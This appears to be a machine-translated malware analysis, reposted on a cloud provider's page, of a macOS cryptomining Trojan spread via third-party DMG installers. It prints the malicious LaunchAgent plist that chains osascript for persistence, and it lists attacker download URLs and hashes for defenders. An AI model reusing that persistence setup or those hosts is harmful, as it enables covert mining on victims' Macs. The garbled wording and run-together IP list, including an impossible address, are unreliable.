Mac next door A brief analysis of the coin-mining Trojan

Source: Internet
Author: User

Background

Recently in the emergency found a Mac on the mining Trojan, the goal is to dig the door, after the visit, the victim users have to install a third-party DMG from the Apple Computer experience (which can be determined a LOL Mac install app will cause the Trojan), Suspected that many third-party DMG on the Internet are carrying related malicious programs.

Phenomenon

According to the user reflects the user generally have the following several symptoms:

    • High CPU Share
    • System Card Dayton
    • Activity Monitor won't open.
    • Computer overheating
Trojan infection

After a brief analysis, suspected that the Trojan originated in the third-party installation package, during the decompression installation process, generated a disguised as 11.png (name can be changed) malicious files and com.apple.Yahoo.plist (~/library/launchagents/directory) Files and com.apple.Google.plist (~/library/launchagents/directory) files

    • Com.apple.Google.plist (Startup item configuration) file as follows, it directs Com.apple.Yahoo.plist to execute
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict>    <key>Label</key>    <string>com.apple.Google</string>    <key>Program</key>    <string>/usr/bin/osascript</string>    <key>ProgramArguments</key>    <array>        <string>osascript</string>        <string>-e</string>        <string>do shell script "osascript ~/Library/LaunchAgents/com.apple.Yahoo.plist"</string>    </array>    <key>RunAtLoad</key>    <true/>    <key>StartInterval</key>    <integer>31104000</integer>    <key>WatchPaths</key>    <array/></dict></plist>

Start

Find an additional PNG file that is certified to run with the 11.png effect consistent with that Trojan's AppleScript file.
After the file runs, it will go to ondayon.com:8080 to download the following malicious files

Path: Under ~/library/safari directory

    • Ssl.plist (Mining procedure)
    • Pools.txt
    • Cpu.txt
    • Config.txt
[email protected]  1 xxxxxx  staff   788212  8 17 16:08 ssl.plist[email protected]  1 xxxxxx  staff      343  8 17 16:08 config.txt[email protected]  1 xxxxxx  staff      229  8 17 16:08 pools.txt[email protected]  1 xxxxxx  staff      256  8 17 16:08 cpu.txt

And in the corresponding ~/library/safari/openssl/lib/directory
Libcrypto.1.0.0.dylib
Libssl.1.0.0.dylib

[email protected]  4 xxxxxx  staff   128  5 30 16:51 .[email protected]  3 xxxxxx  staff      96 5 30 16:51 ..[email protected]  1 xxxxxx  staff    385152  9 29  2017 libssl.1.0.0.dylib[email protected]  1 xxxxxx  staff    1767648  9 29  2017 libcrypto.1.0.0.dylib
Digging mine

Ssl.plist is the xmr of the post-compilation mining from the program, mainly for mining.

Emergency Repair
    • Delete all the files mentioned above and kill the related process;
    • Find the third-party DMG or other third-party app installation package you downloaded and install, and then delete it if you have any problems.

      Related IOCIP Address
43.294.204.18345.195.146.32101.55.20.149
# Domain
ondayon.com
Url
http://ondayon.com:8080/ssl.ziphttp://101.55.20.149/ssl.ziphttp://101.55.20.149/gogoto.pnghttp://101.55.20.149/8/Build.zip
Hash
0659b79c1b1274dc1e708cae010c9a2e778a3a52a476262015a788082b22a697(ibcrypto.1.0.0.dylib)fde413f8f369c2ede2f0f82e0ab7fe35eb6d4c770d73a6a58ad52fd9ddd65804(ssl.plist)c60e197f216fe29f1a9d0b80d0381fcebefe04b6f4d68db3255b6a002f0018c3(libssl.1.0.0.dylib)f89205a8091584e1215cf33854ad764939008004a688b7e530b085e3230effce(ondayon.png) 5619d101a7e554c4771935eb5d992b1a686d4f80a2740e8a8bb05b03a0d6dc2b(Install-LOL.app.zip)2b566d454faabb38cd5b173f9365b89bda5e88d4bfaa7dea97512cc9d89e9150(Build.zip)6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d(x.x)ab4596d3f8347d447051eb4e4075e04c37ce161514b4ce3fae91010aac7ae97f(com.apple.Yahoo.plist)2eb531d2d00c783fb83da9e925177a6aa3f567dec7f678cbe6c30f9dfd5111e7(com.apple.Google.plist)

Mac next door A brief analysis of the coin-mining Trojan

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.